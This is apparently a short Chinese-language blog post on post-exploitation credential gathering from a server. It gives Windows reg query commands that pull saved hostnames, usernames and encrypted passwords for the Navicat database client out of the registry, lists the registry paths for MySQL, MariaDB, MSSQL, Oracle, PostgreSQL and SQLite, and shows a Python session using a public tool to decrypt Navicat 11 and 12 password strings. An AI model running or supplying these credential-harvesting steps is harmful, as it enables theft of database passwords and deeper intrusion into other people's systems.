0%

信息收集之Navicat密码

信息收集之Navicat密码
Navicat 支持很多数据库有MySQL,MariaDB,Oracle,SQLite,PostgreSQL和Microsoft SQL Server。
管理员一般都会把密码记住,在碰到服务器的时候可以查出明文的密码好固然是一件好事.
方法如下:
QQ群:397745473

注册表:

1
2
3
reg query HKEY_CURRENT_USER\SOFTWARE\PremiumSoft\Navicat\Servers /s /v host
reg query HKEY_CURRENT_USER\SOFTWARE\PremiumSoft\Navicat\Servers /s /v pwd
reg query HKEY_CURRENT_USER\SOFTWARE\PremiumSoft\Navicat\Servers /s /v UserName

更多数据:

1
2
3
4
5
6
MySQL        HKEY_CURRENT_USER\Software\PremiumSoft\Navicat\Servers\
MariaDB HKEY_CURRENT_USER\Software\PremiumSoft\NavicatMARIADB\Servers\
Microsoft SQL HKEY_CURRENT_USER\Software\PremiumSoft\NavicatMSSQL\Servers\
Oracle HKEY_CURRENT_USER\Software\PremiumSoft\NavicatOra\Servers\
PostgreSQL HKEY_CURRENT_USER\Software\PremiumSoft\NavicatPG\Servers\
SQLite HKEY_CURRENT_USER\Software\PremiumSoft\NavicatSQLite\Servers\

获取明文密码:
Navicat 11和Navicat 12使用不同加密算法
可以用:https://github.com/DoubleLabyrinth/how-does-navicat-encrypt-password 破解出来

使用方法:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
pip install blowfish
pip install pypiwin32

PS E:\GitHub\how-does-navicat-encrypt-password\python3> python
Python 3.6.3 (v3.6.3:2c5fed8, Oct 3 2017, 18:11:49) [MSC v.1900 64 bit (AMD64)] on win32
Type "help", "copyright", "credits" or "license" for more information.
>>> from NavicatCrypto import *
>>> cipher = Navicat11Crypto()
>>> cipher.EncryptString('This is a test')
'0EA71F51DD37BFB60CCBA219BE3A'
>>> cipher.DecryptString('0EA71F51DD37BFB60CCBA219BE3A')
'This is a test'
>>> cipher2 = Navicat12Crypto()
>>> cipher2.EncryptStringForNCX('This is a test')
'B75D320B6211468D63EB3B67C9E85933'
>>> cipher2.DecryptStringForNCX('B75D320B6211468D63EB3B67C9E85933')
'This is a test'
>>>

详情参考:https://github.com/DoubleLabyrinth/how-does-navicat-encrypt-password

欢迎关注我的其它发布渠道